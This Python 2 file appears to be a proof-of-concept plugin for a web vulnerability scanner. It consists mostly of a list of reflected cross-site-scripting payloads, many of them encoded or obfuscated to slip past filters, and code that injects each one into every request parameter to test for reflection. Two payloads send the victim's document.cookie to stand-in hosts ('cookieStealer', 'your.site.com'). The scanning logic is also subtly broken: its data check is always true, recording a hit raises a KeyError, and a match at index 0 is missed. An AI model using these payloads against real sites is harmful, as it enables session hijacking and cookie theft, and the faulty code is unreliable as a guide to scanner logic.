from  kmdpoc.base_poc import BasePOC
import requests

payload=[
    '''<h1>sec_auto_scan</h1>''',
    '<script>alert("WXSS")</script>',
    '%3cscript%3ealert("WXSS");%3c/script%3e',
    '&ltscript&gtalert(document.cookie);</script>',
    "<IMG%20SRC='javascript:alert(document.cookie)'>",
    '''<IMG%20SRC="javascript:alert('WXSS')"''',
    '''<IMG%20SRC=JaVaScRiPt:alert('WXSS')>''',
    '''<IMG%20SRC=`javascript:alert("'WXSS'")`>''',
    '''<IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>">''',
    '''<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>''',
    '''<IMG%20SRC='javasc	ript:alert(document.cookie)'>''',
    '''<IMG%20SRC="jav&#x09;ascript:alert('WXSS');">''',
    '''<IMG%20SRC="jav&#x0A;ascript:alert('WXSS');">''',
    '''<IMG%20SRC="jav&#x0D;ascript:alert('WXSS');">''',
    '''<IMG%20SRC="%20&#14;%20javascript:alert('WXSS');">''',
    '''<IMG%20DYNSRC="javascript:alert('WXSS')">''',
    '''<IMG%20LOWSRC="javascript:alert('WXSS')">''',
    '''<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>''',
    '''<IMG%20SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>''',
    '''<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>''',
    '''<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>''',
    ''''%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E''',
    '''"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>''',
    '''%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E''',
    ''''';!--"<XSS>=&{()}'''
]
class Poc(BasePOC):
    def verify(self):
        if self.data!=None or self.data!={}:
            xssParas={}
            for paras in self.data.keys():
                for i in payload:
                    self.data[paras]=i
                    resp=self.send_request(timeout=10)
                    if resp.content.find(i)>0:
                        xssParas[paras]+=","+i
            return True,xssParas

        else:
            return False

if __name__=="__main__":

    print Poc("http://kmdscan-api.test.com/api/tasklog/1",data={'pageSkip':"0",'pageTake':'10'}).execute()
